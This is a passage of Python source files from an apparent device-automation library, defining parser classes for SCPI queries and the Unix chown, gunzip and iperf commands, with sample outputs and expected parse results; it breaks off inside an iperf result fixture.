def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
"""
Genericjunipercommand command.
:param connection: moler connection to device, terminal when command is executed.
:param prompt: expected prompt sending by device after command execution
:param newline_chars: Characters to split lines
:param runner: Runner to run command
"""
super(GenericJuniperCommand, self).__init__(connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
```
#### File: cmd/pdu_aten/generic_pdu_aten.py
```python
import six
import abc
from moler.cmd.commandtextualgeneric import CommandTextualGeneric
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
@six.add_metaclass(abc.ABCMeta)
class GenericPduAten(CommandTextualGeneric):
def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
"""
Base class for Aten PDU commands in all states.
:param connection: connection to device.
:param prompt: expected prompt sending by device after command execution. Maybe String or compiled re.
:param runner: runner to run command.
"""
super(GenericPduAten, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
```
#### File: scpi/scpi/idn.py
```python
from moler.cmd.scpi.scpi.genericscpistate import GenericScpiState
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
class Idn(GenericScpiState):
def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
"""
Class for command IDN for SCPI device.
:param connection: connection to device.
:param prompt: expected prompt sending by device after command execution. Maybe String or compiled re.
:param newline_chars: new line chars on device (a list).
:param runner: runner to run command.
"""
super(Idn, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
self.current_ret['RAW_OUTPUT'] = list()
def build_command_string(self):
return "*idn?"
def on_new_line(self, line, is_full_line):
if is_full_line:
self.current_ret['RAW_OUTPUT'].append(line)
return super(Idn, self).on_new_line(line=line, is_full_line=is_full_line)
COMMAND_OUTPUT = """*idn?
Agilent Technologies,N9020A,MY53420262,A.13.15
SCPI>"""
COMMAND_KWARGS = {}
COMMAND_RESULT = {
'RAW_OUTPUT': ['Agilent Technologies,N9020A,MY53420262,A.13.15']
}
```
#### File: scpi/scpi/read.py
```python
import re
from moler.cmd.scpi.scpi.genericscpistate import GenericScpiState
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
class Read(GenericScpiState):
def __init__(self, connection, prompt=None, newline_chars=None, runner=None):
"""
Class for command READ for SCPI device.
:param connection: connection to device.
:param prompt: expected prompt sending by device after command execution. Maybe String or compiled re.
:param newline_chars: new line chars on device (a list).
:param runner: runner to run command.
"""
super(Read, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
def build_command_string(self):
return "READ?"
# +8.59803192358089E-005
_re_value = re.compile(r"(?P<VALUE>[+\-]?\d+\.\d+([eE][+\-]\d+))")
def on_new_line(self, line, is_full_line):
if is_full_line:
if self._regex_helper.search_compiled(self._re_value, line):
self.current_ret['VALUE_RAW'] = self._regex_helper.group("VALUE")
self.current_ret['VALUE_FLOAT'] = float(self._regex_helper.group("VALUE"))
super(Read, self).on_new_line(line=line, is_full_line=is_full_line)
COMMAND_OUTPUT = """READ?
+8.59803192358089E-005
SCPI>"""
COMMAND_KWARGS = {}
COMMAND_RESULT = {
"VALUE_RAW": '+8.59803192358089E-005',
"VALUE_FLOAT": 8.59803192358089E-5,
}
```
#### File: cmd/unix/chown.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
class Chown(GenericUnixCommand):
def __init__(self, connection, param, filename, options=None, prompt=None, newline_chars=None, runner=None):
super(Chown, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.param = param
self.filename = filename
self.options = options
self.ret_required = False
def build_command_string(self):
if self.options:
cmd = "{} {} {} {}".format("chown", self.options, self.param, self.filename)
else:
cmd = "{} {} {}".format("chown", self.param, self.filename)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_error(line)
except ParsingDone:
pass
return super(Chown, self).on_new_line(line, is_full_line)
_reg_fail = re.compile(
r'chown: missing operand after\s(?P<FILENAME>.*)'
r'|chown: cannot access (?P<FILENAME1>.*):\s*(?P<ERROR>.*)'
r'|chown: changing ownership of (?P<FILENAME2>.*):\s*(?P<ERROR1>.*)')
def _parse_error(self, line):
if self._regex_helper.search(Chown._reg_fail, line):
self.set_exception(CommandFailure(self, "ERROR: {}or {}".format(self._regex_helper.group("ERROR"),
self._regex_helper.group("ERROR1"))))
raise ParsingDone
COMMAND_OUTPUT_change_user_execute = """
ute@debdev:~$ chown ute /rom/swconfig.txt
ute@debdev:~$
"""
COMMAND_RESULT_change_user_execute = {
}
COMMAND_KWARGS_change_user_execute = {
"param": "ute",
"filename": "/rom/swconfig.txt",
}
COMMAND_OUTPUT_change_user_and_group_execute = """
ute@debdev:~$ chown ute:ute /rom/swconfig1.txt
ute@debdev:~$ """
COMMAND_RESULT_change_user_and_group_execute = {
}
COMMAND_KWARGS_change_user_and_group_execute = {
"param": "ute:ute",
"filename": "/rom/swconfig1.txt",
}
COMMAND_OUTPUT_change_user_with_option_execute = """
ute@debdev:~$ chown -R ute /rom/swconfig
ute@debdev:~$ """
COMMAND_RESULT_change_user_with_option_execute = {
}
COMMAND_KWARGS_change_user_with_option_execute = {
"options": "-R",
"param": "ute",
"filename": "/rom/swconfig",
}
```
#### File: cmd/unix/gunzip.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
class Gunzip(GenericUnixCommand):
def __init__(self, connection, archive_name, output_file_name=None, options=None, overwrite=False,
prompt=None, newline_chars=None, runner=None):
super(Gunzip, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.archive_name = archive_name
self.output_file_name = output_file_name
self.options = options
self.overwrite = overwrite
self.keys = list()
self.current_ret['RESULT'] = list()
# private variables
self._answered_file = None
self._asks_to_overwrite_send = False
def build_command_string(self):
cmd = 'gunzip'
if self.options:
cmd = '{} {}'.format(cmd, self.options)
if self.archive_name:
for file in self.archive_name:
cmd = '{} {}'.format(cmd, file)
if self.output_file_name:
cmd = '{} > {}'.format(cmd, self.output_file_name)
return cmd
def on_new_line(self, line, is_full_line):
try:
self._parse_info_output(line)
self._asks_to_overwrite(line)
self._create_dictionary_at_l_option(line)
self._command_failure(line)
except ParsingDone:
pass
return super(Gunzip, self).on_new_line(line, is_full_line)
_re_info_output = re.compile(r" -- replaced with")
def _parse_info_output(self, line):
if self._regex_helper.search_compiled(Gunzip._re_info_output, line):
self.current_ret['RESULT'].append(line)
raise ParsingDone
_re_overwrite = re.compile(r"gzip:\s+(?P<FILE_NAME>.*)\s+already exists", re.IGNORECASE)
def _asks_to_overwrite(self, line):
if self._regex_helper.search_compiled(Gunzip._re_overwrite, line):
current_file = self._regex_helper.group("FILE_NAME")
if current_file != self._answered_file:
if self.overwrite:
self.connection.sendline('y')
else:
self.connection.sendline('n')
self.set_exception(CommandFailure(self, "ERROR: {} already exists".format(current_file)))
self._answered_file = current_file
raise ParsingDone
_re_l_option = re.compile(r"(?P<L_OPTION> compressed\s*uncompressed\s*ratio\s*uncompressed_name.*)", re.IGNORECASE)
def _create_dictionary_at_l_option(self, line):
if self.keys and not self.current_ret['RESULT']:
self.values = line.strip().split()
if 'date' in self.keys:
self.values = self.values[:2] + ['{} {}'.format(self.values[2], self.values[3])] + self.values[4:]
self.current_ret['RESULT'].append(dict(zip(self.keys, self.values)))
raise ParsingDone
if self._regex_helper.search_compiled(Gunzip._re_l_option, line):
self.keys = line.strip().split()
raise ParsingDone
_re_error = re.compile(r"gzip:\s(?P<ERROR_MSG>.*)", re.IGNORECASE)
def _command_failure(self, line):
if self._regex_helper.search_compiled(Gunzip._re_error, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("ERROR_MSG"))))
raise ParsingDone
COMMAND_OUTPUT_without_options = """
xyz@debian:~$ gunzip new.gz
xyz@debian:~$"""
COMMAND_KWARGS_without_options = {
'archive_name': ['new.gz']
}
COMMAND_RESULT_without_options = {
'RESULT': []
}
COMMAND_OUTPUT_loud_options = """
xyz@debian:~$ gunzip -v new.gz
new.gz: -7.7% -- replaced with new
xyz@debian:~$"""
COMMAND_KWARGS_loud_options = {
'archive_name': ['new.gz'],
'options': '-v'
}
COMMAND_RESULT_loud_options = {
'RESULT': ['new.gz:\t -7.7% -- replaced with new']
}
COMMAND_OUTPUT_overwrite = """
xyz@debian:~$ gunzip new.gz
gzip: new already exists; do you wish to overwrite (y or n)? xyz@debian:~$"""
COMMAND_KWARGS_overwrite = {
'archive_name': ['new.gz'],
'overwrite': 'True'
}
COMMAND_RESULT_overwrite = {
'RESULT': []
}
COMMAND_OUTPUT_send_to_another_directory = """
xyz@debian:~$ gunzip afile.gz > sed/afile
xyz@debian:~$"""
COMMAND_KWARGS_send_to_another_directory = {
'archive_name': ['afile.gz'],
'output_file_name': 'sed/afile'
}
COMMAND_RESULT_send_to_another_directory = {
'RESULT': []
}
COMMAND_OUTPUT_on_l_option = """
xyz@debian:~$ gunzip -l afile.gz
compressed uncompressed ratio uncompressed_name
26 0 0.0% afile
xyz@debian:~$"""
COMMAND_KWARGS_on_l_option = {
'archive_name': ['afile.gz'],
'options': '-l'
}
COMMAND_RESULT_on_l_option = {
'RESULT': [{'compressed': '26', 'uncompressed': '0', 'ratio': '0.0%', 'uncompressed_name': 'afile'}]
}
COMMAND_OUTPUT_on_vl_option = """
xyz@debian:~$ gunzip -vl afile.gz
method crc date time compressed uncompressed ratio uncompressed_name
defla 00000000 Aug 9 12:27 26 0 0.0% afile
xyz@debian:~$"""
COMMAND_KWARGS_on_vl_option = {
'archive_name': ['afile.gz'],
'options': '-vl'
}
COMMAND_RESULT_on_vl_option = {
'RESULT': [{'method': 'defla', 'crc': '00000000', 'date': 'Aug 9', 'time': '12:27', 'compressed': '26',
'uncompressed': '0', 'ratio': '0.0%', 'uncompressed_name': 'afile'}]
}
```
#### File: cmd/unix/iperf.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.util.converterhelper import ConverterHelper
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
import warnings
class Iperf(GenericUnixCommand):
"""
Run iperf command and return its statistics
Statistics are given as list of dicts like::
{'Interval': '0.0- 1.0 sec',
'Transfer Raw': '1.17 MBytes',
'Transfer': 1226833,
'Bandwidth Raw': '9.84 Mbits/sec',
'Bandwidth': 1230000,
'Jitter': '1.830 ms',
'Lost_vs_Total_Datagrams': '0/ 837 (0%)'}
Above dict represents iperf output like::
[ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
[904] 0.0- 1.0 sec 1.17 MBytes 9.84 Mbits/sec 1.830 ms 0/ 837 (0%)
Please note that numeric values are normalized to Bytes:
- Transfer is in Bytes
- Bandwith is in Bytes/sec
"""
def __init__(self, connection, options, prompt=None, newline_chars=None, runner=None):
super(Iperf, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.options = options
self.current_ret['CONNECTIONS'] = dict()
self.current_ret['INFO'] = list()
# private values
self._connection_dict = dict()
self._converter_helper = ConverterHelper()
warnings.warn("Iperf command is deprecated - use Iperf2 instead", DeprecationWarning, stacklevel=2)
def build_command_string(self):
cmd = 'iperf ' + str(self.options)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._command_failure(line)
self._parse_connection_name_and_id(line)
self._parse_headers(line)
self._parse_connection_info(line)
self._parse_connection_headers(line)
except ParsingDone:
pass
return super(Iperf, self).on_new_line(line, is_full_line)
_re_command_failure = re.compile(r"(?P<FAILURE_MSG>.*failed.*|.*error.*|.*command not found.*|.*iperf:.*)")
def _command_failure(self, line):
if self._regex_helper.search_compiled(Iperf._re_command_failure, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("FAILURE_MSG"))))
raise ParsingDone
# [904] local 10.1.1.1 port 5001 connected with 10.6.2.5 port 32781
_re_connection_name_and_id = re.compile(r"(?P<ID>\[\s*\d*\])\s*(?P<ID_NAME>.*port\s*\d*\s*connected with.*)")
def _parse_connection_name_and_id(self, line):
if self._regex_helper.search_compiled(Iperf._re_connection_name_and_id, line):
connection_id = self._regex_helper.group("ID")
connection_name = self._regex_helper.group("ID_NAME")
connection_dict = {connection_id: connection_name}
self._connection_dict.update(connection_dict)
raise ParsingDone
# iperf output for: udp client, tcp client, tcp server
# [ ID] Interval Transfer Bandwidth
# iperf output for: udp server
# [ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
_re_headers = re.compile(r"\[\s+ID\]\s+Interval\s+Transfer\s+Bandwidth")
def _parse_headers(self, line):
if self._regex_helper.search_compiled(Iperf._re_headers, line):
# ignore headers
raise ParsingDone
# udp:
# [ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
# [ 3] 0.0- 1.0 sec 612 KBytes 5010 Kbits/sec 0.022 ms 0/ 426 (0%)
#
# tcp:
# [ ID] Interval Transfer Bandwidth
# [ 4] 0.0- 1.0 sec 979 KBytes 8020 Kbits/sec
_re_connection_info = re.compile(r"(?P<CONNECTION_ID>\[\s*\d*\])\s*(?P<CONNECTION_REPORT>.*)")
_re_ci = r"(?P<ID>\[\s*\d*\])\s+(?P<Interval>\d+.+sec)\s+(?P<Transfer>[\d\.]+\s+\w+)\s+(?P<Bandwidth>[\d\.]+\s+\w+/sec)"
_re_ci_udp_svr = _re_ci + r"\s+(?P<Jitter>\d+\.\d+\s\w+)\s+(?P<Lost_vs_Total_Datagrams>\d+/\s*\d+\s*\([\d\.]+\%\))"
_re_iperf_record = re.compile(_re_ci)
_re_iperf_record_udp_svr = re.compile(_re_ci_udp_svr)
def _parse_connection_info(self, line):
regex_found = self._regex_helper.search_compiled
if regex_found(Iperf._re_iperf_record_udp_svr, line) or regex_found(Iperf._re_iperf_record, line):
iperf_record = self._regex_helper.groupdict()
connection_id = iperf_record.pop("ID")
connection_name = self._connection_dict[connection_id]
normalized_iperf_record = self._normalize_to_bytes(iperf_record)
self._update_current_ret(connection_name, normalized_iperf_record)
raise ParsingDone
def _update_current_ret(self, connection_name, info_dict):
if connection_name in self.current_ret['CONNECTIONS']:
self.current_ret['CONNECTIONS'][connection_name].append(info_dict)
else:
connection_dict = {connection_name: [info_dict]}
self.current_ret['CONNECTIONS'].update(connection_dict)
# [ 5] Sent 2552 datagrams
# [ 5] Server Report:
# ------------------------------------------------------------
_re_ornaments = re.compile(r"(?P<ORNAMENTS>----*|\[\s*ID\].*)", re.IGNORECASE)
def _parse_connection_headers(self, line):
if not self._regex_helper.search_compiled(Iperf._re_ornaments, line):
self.current_ret['INFO'].append(line.strip())
raise ParsingDone
def _normalize_to_bytes(self, input_dict):
new_dict = {}
for (key, raw_value) in input_dict.items():
if 'Bytes' in raw_value: # iperf MBytes means 1024 * 1024 Bytes - see iperf.fr/iperf-doc.php
new_dict[key + " Raw"] = raw_value
value_in_bytes, _, _ = self._converter_helper.to_bytes(raw_value)
new_dict[key] = value_in_bytes
elif 'bits' in raw_value: # iperf Mbits means 1000 * 1000 bits - see iperf.fr/iperf-doc.php
new_dict[key + " Raw"] = raw_value
value_in_bits, _, _ = self._converter_helper.to_bytes(raw_value, binary_multipliers=False)
value_in_bytes = value_in_bits // 8
new_dict[key] = value_in_bytes
else:
new_dict[key] = raw_value
return new_dict
COMMAND_OUTPUT_basic_client = """
xyz@debian:~$ iperf -c 10.1.1.1
------------------------------------------------------------
Client connecting to 10.1.1.1, TCP port 5001
TCP window size: 16384 Byte (default)
------------------------------------------------------------
[ 3] local 192.168.0.102 port 49597 connected with 192.168.0.100 port 5001
[ ID] Interval Transfer Bandwidth
[ 3] 0.0- 1.0 sec 28.6 MBytes 240 Mbits/sec
[ 3] 1.0- 2.0 sec 25.9 MBytes 217 Mbits/sec
[ 3] 2.0- 3.0 sec 26.5 MBytes 222 Mbits/sec
[ 3] 3.0- 4.0 sec 26.6 MBytes 223 Mbits/sec
[ 3] 4.0- 5.0 sec 26.0 MBytes 218 Mbits/sec
[ 3] 5.0- 6.0 sec 26.2 MBytes 220 Mbits/sec
[ 3] 6.0- 7.0 sec 26.8 MBytes 224 Mbits/sec
[ 3] 7.0- 8.0 sec 26.0 MBytes 218 Mbits/sec
[ 3] 8.0- 9.0 sec 25.8 MBytes 216 Mbits/sec
[ 3] 9.0-10.0 sec 26.4 MBytes 221 Mbits/sec
[ 3] 0.0-10.0 sec 265 MBytes 222 Mbits/sec
xyz@debian:~$"""
COMMAND_KWARGS_basic_client = {
'options': '-c 10.1.1.1'
}
COMMAND_RESULT_basic_client = {
'CONNECTIONS':
{'local 192.168.0.102 port 49597 connected with 192.168.0.100 port 5001': [
{'Bandwidth Raw': '240 Mbits/sec', 'Bandwidth': 30000000, 'Transfer Raw': '28.6 MBytes',
'Transfer': 29989273, 'Interval': '0.0- 1.0 sec'},
{'Bandwidth Raw': '217 Mbits/sec', 'Bandwidth': 27125000, 'Transfer Raw': '25.9 MBytes',
'Transfer': 27158118, 'Interval': '1.0- 2.0 sec'},
{'Bandwidth Raw': '222 Mbits/sec', 'Bandwidth': 27750000, 'Transfer Raw': '26.5 MBytes',
'Transfer': 27787264, 'Interval': '2.0- 3.0 sec'},
{'Bandwidth Raw': '223 Mbits/sec', 'Bandwidth': 27875000, 'Transfer Raw': '26.6 MBytes',
'Transfer': 27892121, 'Interval': '3.0- 4.0 sec'},
{'Bandwidth Raw': '218 Mbits/sec', 'Bandwidth': 27250000, 'Transfer Raw': '26.0 MBytes',
'Transfer': 27262976, 'Interval': '4.0- 5.0 sec'},
{'Bandwidth Raw': '220 Mbits/sec', 'Bandwidth': 27500000, 'Transfer Raw': '26.2 MBytes',
'Transfer': 27472691, 'Interval': '5.0- 6.0 sec'},
{'Bandwidth Raw': '224 Mbits/sec', 'Bandwidth': 28000000, 'Transfer Raw': '26.8 MBytes',
'Transfer': 28101836, 'Interval': '6.0- 7.0 sec'},
{'Bandwidth Raw': '218 Mbits/sec', 'Bandwidth': 27250000, 'Transfer Raw': '26.0 MBytes',
'Transfer': 27262976, 'Interval': '7.0- 8.0 sec'},
{'Bandwidth Raw': '216 Mbits/sec', 'Bandwidth': 27000000, 'Transfer Raw': '25.8 MBytes',
'Transfer': 27053260, 'Interval': '8.0- 9.0 sec'},
{'Bandwidth Raw': '221 Mbits/sec', 'Bandwidth': 27625000, 'Transfer Raw': '26.4 MBytes',
'Transfer': 27682406, 'Interval': '9.0-10.0 sec'},
{'Bandwidth Raw': '222 Mbits/sec', 'Bandwidth': 27750000, 'Transfer Raw': '265 MBytes',
'Transfer': 277872640, 'Interval': '0.0-10.0 sec'}]},
'INFO': ['Client connecting to 10.1.1.1, TCP port 5001', 'TCP window size: 16384 Byte (default)']
}
COMMAND_OUTPUT_basic_server = """
xyz@debian:~$ iperf -u
------------------------------------------------------------
Server listening on UDP port 5001
Receiving 1470 byte datagrams
UDP buffer size: 8.00 KByte (default)
------------------------------------------------------------
[904] local 10.1.1.1 port 5001 connected with 10.6.2.5 port 32781
[ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
[904] 0.0- 1.0 sec 1.17 MBytes 9.84 Mbits/sec 1.830 ms 0/ 837 (0%)
[904] 1.0- 2.0 sec 1.18 MBytes 9.94 Mbits/sec 1.846 ms 5/ 850 (0.59%)
[904] 2.0- 3.0 sec 1.19 MBytes 9.98 Mbits/sec 1.802 ms 2/ 851 (0.24%)
[904] 3.0- 4.0 sec 1.19 MBytes 10.0 Mbits/sec 1.830 ms 0/ 850 (0%)
[904] 4.0- 5.0 sec 1.19 MBytes 9.98 Mbits/sec 1.846 ms 1/ 850 (0.12%)
[904] 5.0- 6.0 sec 1.19 MBytes 10.0 Mbits/sec 1.806 ms 0/ 851 (0%)
[904] 6.0- 7.0 sec 1.06 MBytes 8.87 Mbits/sec 1.803 ms 1/ 755 (0.13%)
[904] 7.0- 8.0 sec 1.19 MBytes 10.0 Mbits/sec 1.831 ms 0/ 850 (0%)
[904] 8.0- 9.0 sec 1.19 MBytes 10.0 Mbits/sec 1.841 ms 0/ 850 (0%)
[904] 9.0-10.0 sec 1.19 MBytes 10.0 Mbits/sec 1.801 ms 0/ 851 (0%)
[904] 0.0-10.0 sec 11.8 MBytes 9.86 Mbits/sec 2.618 ms 9/ 8409 (0.11%)
xyz@debian:~$"""
COMMAND_KWARGS_basic_server = {
'options': '-u'
}
COMMAND_RESULT_basic_server = {
'CONNECTIONS': {
'local 10.1.1.1 port 5001 connected with 10.6.2.5 port 32781': [{'Bandwidth Raw': '9.84 Mbits/sec',
'Bandwidth': 1230000,
'Interval': '0.0- 1.0 sec',
'Jitter': '1.830 ms',
'Lost_vs_Total_Datagrams': '0/ 837 (0%)',
'Transfer Raw': '1.17 MBytes',
'Transfer': 1226833},
{'Bandwidth Raw': '9.94 Mbits/sec',
'Bandwidth': 1242500,
'Interval': '1.0- 2.0 sec',
'Jitter': '1.846 ms',
'Lost_vs_Total_Datagrams': '5/ 850 (0.59%)',
'Transfer Raw': '1.18 MBytes',
'Transfer': 1237319},
{'Bandwidth Raw': '9.98 Mbits/sec',
'Bandwidth': 1247500,
'Interval': '2.0- 3.0 sec',
'Jitter': '1.802 ms',
'Lost_vs_Total_Datagrams': '2/ 851 (0.24%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '3.0- 4.0 sec',
'Jitter': '1.830 ms',
'Lost_vs_Total_Datagrams': '0/ 850 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '9.98 Mbits/sec',
'Bandwidth': 1247500,
'Interval': '4.0- 5.0 sec',
'Jitter': '1.846 ms',
'Lost_vs_Total_Datagrams': '1/ 850 (0.12%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '5.0- 6.0 sec',
'Jitter': '1.806 ms',
'Lost_vs_Total_Datagrams': '0/ 851 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '8.87 Mbits/sec',
'Bandwidth': 1108750,
'Interval': '6.0- 7.0 sec',
'Jitter': '1.803 ms',
'Lost_vs_Total_Datagrams': '1/ 755 (0.13%)',
'Transfer Raw': '1.06 MBytes',
'Transfer': 1111490},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '7.0- 8.0 sec',
'Jitter': '1.831 ms',
'Lost_vs_Total_Datagrams': '0/ 850 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '8.0- 9.0 sec',
'Jitter': '1.841 ms',
'Lost_vs_Total_Datagrams': '0/ 850 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '9.0-10.0 sec',
'Jitter': '1.801 ms',
'Lost_vs_Total_Datagrams': '0/ 851 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '9.86 Mbits/sec',
'Bandwidth': 1232500,
'Interval': '0.0-10.0 sec',
'Jitter': '2.618 ms',
'Lost_vs_Total_Datagrams': '9/ 8409 (0.11%)',
'Transfer Raw': '11.8 MBytes',
'Transfer': 12373196}]},
'INFO': ['Server listening on UDP port 5001', 'Receiving 1470 byte datagrams',
'UDP buffer size: 8.00 KByte (default)']}
COMMAND_OUTPUT_bidirectional_udp_client = """
ute@IAV-KRA-TL160:~$ iperf -c 192.168.0.12 -u -p 5016 -f k -i 1.0 -t 6.0 --dualtest -b 5000.0k
------------------------------------------------------------
Server listening on UDP port 5016
Receiving 1470 byte datagrams
UDP buffer size: 1024 KByte (default)
------------------------------------------------------------
------------------------------------------------------------
Client connecting to 192.168.0.12, UDP port 5016
Sending 1470 byte datagrams, IPG target: 2352.00 us (kalman adjust)
UDP buffer size: 1024 KByte (default)
------------------------------------------------------------
[ 4] local 192.168.0.10 port 56262 connected with 192.168.0.12 port 5016
[ 3] local 192.168.0.10 port 5016 connected with 192.168.0.12 port 47384
[ ID] Interval Transfer Bandwidth
[ 4] 0.0- 1.0 sec 613 KBytes 5022 Kbits/sec
[ 3] 0.0- 1.0 sec 612 KBytes 5010 Kbits/sec 0.011 ms 0/ 426 (0%)
[ 4] 1.0- 2.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 1.0- 2.0 sec 610 KBytes 4998 Kbits/sec 0.012 ms 0/ 425 (0%)
[ 4] 2.0- 3.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 2.0- 3.0 sec 610 KBytes 4998 Kbits/sec 0.017 ms 0/ 425 (0%)
[ 4] 3.0- 4.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 3.0- 4.0 sec 610 KBytes 4998 Kbits/sec 0.019 ms 0/ 425 (0%)
[ 4] 4.0- 5.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 4.0- 5.0 sec 610 KBytes 4998 Kbits/sec 0.014 ms 0/ 425 (0%)
[ 4] 5.0- 6.0 sec 610 KBytes 4998 Kbits/sec
[ 4] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec
[ 4] Sent 2552 datagrams
[ 3] 5.0- 6.0 sec 612 KBytes 5010 Kbits/sec 0.017 ms 0/ 426 (0%)
[ 3] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec 0.017 ms 0/ 2552 (0%)
[ 4] Server Report:
[ 4] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec 0.017 ms 0/ 2552 (0%)
ute@IAV-KRA-TL160:~$"""
COMMAND_KWARGS_bidirectional_udp_client = {
'options': '-c 192.168.0.12 -u -p 5016 -f k -i 1.0 -t 6.0 --dualtest -b 5000.0k'
}
COMMAND_RESULT_bidirectional_udp_client = {
'CONNECTIONS': {
'local 192.168.0.10 port 56262 connected with 192.168.0.12 port 5016': [{'Transfer': 627712,
'Bandwidth': 627750,
'Transfer Raw': '613 KBytes',
'Bandwidth Raw': '5022 Kbits/sec',
'Interval': '0.0- 1.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '1.0- 2.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '2.0- 3.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '3.0- 4.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '4.0- 5.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '5.0- 6.0 sec'},
{'Transfer': 3751936,
'Bandwidth': 625000,
'Transfer Raw': '3664 KBytes',
'Bandwidth Raw': '5000 Kbits/sec',
'Interval': '0.0- 6.0 sec'},
{'Transfer Raw': '3664 KBytes',
'Jitter': '0.017 ms',
'Transfer': 3751936,
'Interval': '0.0- 6.0 sec',
'Bandwidth': 625000,
'Lost_vs_Total_Datagrams': '0/ 2552 (0%)',
'Bandwidth Raw': '5000 Kbits/sec'}],
'local 192.168.0.10 port 5016 connected with 192.168.0.12 port 47384': [{'Transfer Raw': '612 KBytes',
'Jitter': '0.011 ms',
'Transfer': 626688,
'Interval': '0.0- 1.0 sec',
'Bandwidth': 626250,
'Lost_vs_Total_Datagrams': '0/ 426 (0%)',
'Bandwidth Raw': '5010 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.012 ms',
'Transfer': 624640,
'Interval': '1.0- 2.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.017 ms',
'Transfer': 624640,
'Interval': '2.0- 3.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.019 ms',
'Transfer': 624640,
'Interval': '3.0- 4.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.014 ms',
'Transfer': 624640,
'Interval': '4.0- 5.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '612 KBytes',
'Jitter': '0.017 ms',
'Transfer': 626688,
'Interval': '5.0- 6.0 sec',
'Bandwidth': 626250,
'Lost_vs_Total_Datagrams': '0/ 426 (0%)',
'Bandwidth Raw': '5010 Kbits/sec'},
{'Transfer Raw': '3664 KBytes',
'Jitter': '0.017 ms',
'Transfer': 3751936,
